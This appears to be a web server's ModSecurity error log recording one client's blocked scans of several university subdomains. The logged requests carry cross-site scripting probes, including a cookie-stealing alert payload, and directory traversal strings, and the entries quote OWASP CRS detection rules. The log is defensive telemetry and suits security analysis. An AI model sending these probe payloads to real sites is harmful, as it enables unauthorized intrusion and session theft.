[Tue Aug 29 11:56:59.747808 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAArbWQYAAAAG"]
[Tue Aug 29 11:56:59.761029 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8VwAAAAS"]
[Tue Aug 29 11:56:59.827087 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8V8AAAAS"]
[Tue Aug 29 11:56:59.847019 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8WAAAAAS"]
[Tue Aug 29 11:57:00.595165 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAAoz8WIAAAAS"]
[Tue Aug 29 11:57:00.599883 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAArB19MAAAAV"]
[Tue Aug 29 11:57:00.806591 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAArB19UAAAAV"]
[Tue Aug 29 11:57:00.845245 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAAoz8WUAAAAS"]
[Tue Aug 29 11:57:01.029143 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAm80SgAAAAF"]
[Tue Aug 29 11:57:01.049493 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16ncCo-f0AAAm80SkAAAAF"]
[Tue Aug 29 11:57:01.566453 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAArcTMUAAAAH"]
[Tue Aug 29 11:57:01.635274 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAArcTMcAAAAH"]
[Tue Aug 29 11:57:01.656505 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAolLA0AAAAe"]
[Tue Aug 29 11:57:01.658424 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAArcTMgAAAAH"]
[Tue Aug 29 11:57:01.705428 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAolLA8AAAAe"]
[Tue Aug 29 11:57:01.714093 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAq5@a8AAAAK"]
[Tue Aug 29 11:57:01.724856 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAArB19wAAAAV"]
[Tue Aug 29 11:57:01.756859 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAoz8WwAAAAS"]
[Tue Aug 29 11:57:01.759220 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAolLBEAAAAe"]
[Tue Aug 29 11:57:02.579463 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAArB1@QAAAAV"]
[Tue Aug 29 11:57:02.684486 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq5@bgAAAAK"]
[Tue Aug 29 11:57:02.688231 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq-HnoAAAAT"]
[Tue Aug 29 11:57:02.688539 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAArB1@gAAAAV"]
[Tue Aug 29 11:57:02.747552 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16nsCo-f0AAAq-Hn0AAAAT"]
[Tue Aug 29 11:57:02.763577 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq5@bwAAAAK"]
